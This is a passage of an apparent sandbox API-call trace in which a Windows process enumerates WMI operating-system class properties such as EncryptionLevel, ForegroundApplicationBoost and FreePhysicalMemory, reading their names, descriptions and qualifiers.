	[0050.682] IUnknown:Release (This=0x233e12d5ec0) returned 0x1
	[0050.682] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.682] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290e48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.682] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291238, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.682] GetCurrentThreadId () returned 0xdf0
	[0050.682] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.682] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Boolean indicating whether the operating system is distributed across several computer system nodes. If so, these nodes should be grouped as a cluster.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.683] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.683] lstrlenA (lpString="") returned 0
	[0050.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.683] SysStringLen (param_1="Boolean indicating whether the operating system is distributed across several computer system nodes. If so, these nodes should be grouped as a cluster.") returned 0x97
	[0050.683] SysStringLen (param_1="") returned 0x0
	[0050.683] GetCurrentThreadId () returned 0xdf0
	[0050.683] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.683] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.683] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.684] SysStringLen (param_1="Distributed") returned 0xb
	[0050.684] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.684] SysStringLen (param_1="Distributed") returned 0xb
	[0050.684] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.684] SysStringLen (param_1="Distributed") returned 0xb
	[0050.684] SysStringLen (param_1="Debug") returned 0x5
	[0050.684] SysStringLen (param_1="Distributed") returned 0xb
	[0050.684] SysStringLen (param_1="Description") returned 0xb
	[0050.684] SysStringLen (param_1="Description") returned 0xb
	[0050.684] SysStringLen (param_1="Distributed") returned 0xb
	[0050.684] IUnknown:Release (This=0x233e12d5400) returned 0x1
	[0050.684] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.685] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290d28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.685] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290ff8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.685] GetCurrentThreadId () returned 0xdf0
	[0050.685] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.685] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The EncryptionLevel property specifies if the encryption level for secure transactions is 40-bit, 128-bit, or n-bit encryption.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.685] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.686] lstrlenA (lpString="") returned 0
	[0050.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.686] SysStringLen (param_1="The EncryptionLevel property specifies if the encryption level for secure transactions is 40-bit, 128-bit, or n-bit encryption.") returned 0x7f
	[0050.686] SysStringLen (param_1="") returned 0x0
	[0050.687] GetCurrentThreadId () returned 0xdf0
	[0050.687] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.687] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bdd0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271010, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.687] SafeArrayGetLBound (in: psa=0x233e128bdd0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.687] SafeArrayGetUBound (in: psa=0x233e128bdd0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.687] SafeArrayGetElement (in: psa=0x233e128bdd0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.688] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.688] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b710*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1271990, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.688] SafeArrayGetLBound (in: psa=0x233e128b710, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.688] SafeArrayGetUBound (in: psa=0x233e128b710, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.688] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.688] lstrlenW (lpString="Values") returned 6
	[0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.688] lstrlenW (lpString="read") returned 4
	[0050.688] lstrlenW (lpString="Values") returned 6
	[0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0050.688] lstrlenW (lpString="write") returned 5
	[0050.688] lstrlenW (lpString="Values") returned 6
	[0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.688] lstrlenW (lpString="In") returned 2
	[0050.688] lstrlenW (lpString="Values") returned 6
	[0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.688] lstrlenW (lpString="Out") returned 3
	[0050.688] lstrlenW (lpString="Values") returned 6
	[0050.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0050.688] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.689] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.689] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.689] IUnknown:Release (This=0x233e12e36f0) returned 0x1
	[0050.690] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.690] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.690] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.690] SysStringLen (param_1="Description") returned 0xb
	[0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.690] SysStringLen (param_1="Distributed") returned 0xb
	[0050.690] SysStringLen (param_1="Distributed") returned 0xb
	[0050.690] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.691] IUnknown:Release (This=0x233e12d4bf0) returned 0x1
	[0050.691] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.691] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128c348, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.691] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bd88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.691] GetCurrentThreadId () returned 0xdf0
	[0050.691] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.691] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ForegroundApplicationBoost property indicates the increase in priority given to the foreground application. On computer systems running Windows NT 4.0 and Windows 2000, application boost is implemented by giving an application more execution time slices (quantum lengths). A ForegroundApplicationBoost value of 0 indicates the system boosts the quantum length by 6; if 1, then 12; and if 2 then 18. On Windows NT 3.51 and earlier, application boost is implemented by increasing the scheduling priority. For these systems, the scheduling priority is increased by the value of this property. The default value is 2.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.692] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.692] lstrlenA (lpString="") returned 0
	[0050.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc160, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.692] SysStringLen (param_1="The ForegroundApplicationBoost property indicates the increase in priority given to the foreground application. On computer systems running Windows NT 4.0 and Windows 2000, application boost is implemented by giving an application more execution time slices (quantum lengths). A ForegroundApplicationBoost value of 0 indicates the system boosts the quantum length by 6; if 1, then 12; and if 2 then 18. On Windows NT 3.51 and earlier, application boost is implemented by increasing the scheduling priority. For these systems, the scheduling priority is increased by the value of this property. The default value is 2.") returned 0x269
	[0050.692] SysStringLen (param_1="") returned 0x0
	[0050.692] GetCurrentThreadId () returned 0xdf0
	[0050.692] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.692] IWbemClassObject:Get (in: This=0x233e12d4690, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b810*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1270ef0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.692] SafeArrayGetLBound (in: psa=0x233e128b810, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.692] SafeArrayGetUBound (in: psa=0x233e128b810, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.692] SafeArrayGetElement (in: psa=0x233e128b810, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.692] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.693] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b710*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1271830, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.693] SafeArrayGetLBound (in: psa=0x233e128b710, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.693] SafeArrayGetUBound (in: psa=0x233e128b710, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.693] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.693] lstrlenW (lpString="Values") returned 6
	[0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.693] lstrlenW (lpString="read") returned 4
	[0050.693] lstrlenW (lpString="Values") returned 6
	[0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0050.693] lstrlenW (lpString="write") returned 5
	[0050.693] lstrlenW (lpString="Values") returned 6
	[0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.693] lstrlenW (lpString="In") returned 2
	[0050.693] lstrlenW (lpString="Values") returned 6
	[0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.693] lstrlenW (lpString="Out") returned 3
	[0050.693] lstrlenW (lpString="Values") returned 6
	[0050.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0050.693] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.693] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.693] SafeArrayGetElement (in: psa=0x233e128b710, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.694] IUnknown:Release (This=0x233e12e2ee0) returned 0x1
	[0050.694] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.694] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.694] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.694] SysStringLen (param_1="Description") returned 0xb
	[0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.694] SysStringLen (param_1="Distributed") returned 0xb
	[0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.694] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.694] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.694] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.694] IUnknown:Release (This=0x233e12d4690) returned 0x1
	[0050.694] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.694] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f088, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.695] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f0d8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.695] GetCurrentThreadId () returned 0xdf0
	[0050.695] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.695] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of kilobytes of physical memory currently unused and available", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.695] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.695] lstrlenA (lpString="") returned 0
	[0050.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.695] SysStringLen (param_1="Number of kilobytes of physical memory currently unused and available") returned 0x45
	[0050.695] SysStringLen (param_1="") returned 0x0
	[0050.695] GetCurrentThreadId () returned 0xdf0
	[0050.695] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.695] IWbemClassObject:Get (in: This=0x233e12d4940, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.695] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.696] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.696] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.696] SysStringLen (param_1="Description") returned 0xb
	[0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.696] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.696] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.696] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.696] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.696] IUnknown:Release (This=0x233e12d4940) returned 0x1
	[0050.698] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.698] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bd88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.698] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f088, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.698] GetCurrentThreadId () returned 0xdf0
	[0050.698] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.698] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The total number of kilobytes that can be mapped into the operating system's paging files without causing any other pages to be swapped out.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.699] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.699] lstrlenA (lpString="") returned 0
	[0050.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.699] SysStringLen (param_1="The total number of kilobytes that can be mapped into the operating system's paging files without causing any other pages to be swapped out.") returned 0x8c
	[0050.699] SysStringLen (param_1="") returned 0x0
	[0050.699] GetCurrentThreadId () returned 0xdf0
	[0050.699] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.699] IWbemClassObject:Get (in: This=0x233e12d4ea0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.699] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.699] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.699] SysStringLen (param_1="Description") returned 0xb
	[0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.699] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.699] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.699] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.699] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.699] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.700] IUnknown:Release (This=0x233e12d4ea0) returned 0x1
	[0050.700] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.700] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f178, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.700] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f1c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.700] GetCurrentThreadId () returned 0xdf0
	[0050.700] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.700] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of kilobytes of virtual memory currently unused and available. For example, this may be calculated by adding the amount of free RAM to the amount of free paging space (i.e., adding the properties, FreePhysicalMemory and FreeSpaceInPagingFiles).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.701] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.701] lstrlenA (lpString="") returned 0
	[0050.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.701] SysStringLen (param_1="Number of kilobytes of virtual memory currently unused and available. For example, this may be calculated by adding the amount of free RAM to the amount of free paging space (i.e., adding the properties, FreePhysicalMemory and FreeSpaceInPagingFiles).") returned 0xfb
	[0050.701] SysStringLen (param_1="") returned 0x0
	[0050.701] GetCurrentThreadId () returned 0xdf0
	[0050.701] ??0CHString@@QEAA@XZ () returned 0x350027ed78
